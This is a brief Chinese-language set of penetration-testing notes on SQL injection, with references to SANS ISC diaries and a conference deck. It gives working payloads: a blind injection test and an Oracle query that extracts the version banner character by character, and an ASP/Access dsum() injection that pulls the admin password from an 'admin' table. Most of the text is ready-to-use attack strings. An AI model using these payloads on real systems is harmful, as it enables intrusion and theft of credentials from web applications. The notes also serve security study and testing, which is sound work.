SAMPLE
知识点
使用 AND 1 = 1 / 1 或者 1 = 1 / 0 判断是否存在注入,如果正确就会返回页面,如果错误就是1/0语法错误使得页面报错;
queueID = 743994 AND 1 = 1 / (select case when substr(banner, 1, 1) = 'A' then 1 else 0 end from (select banner from v$version where banner like '%Oracle%'))
reference
https://isc.sans.edu/diary/Exploiting+%28pretty%29+blind+SQL+injections/20733
https://isc.sans.edu/diary/Advanced+blind+SQL+injection+%28with+Oracle+examples%29/6409
SAMPLE
知识点
通过dsum()和dfirst()函数
/list.asp?id=123-dsum(chr(39)+cstr((select+top+1+password+from+admin)),'admin')
reference
补天会议-渗透测试技巧PPT
https://627fff.lt.yunpan.cn/lk/cSG5zCGGLtgBs
d7a5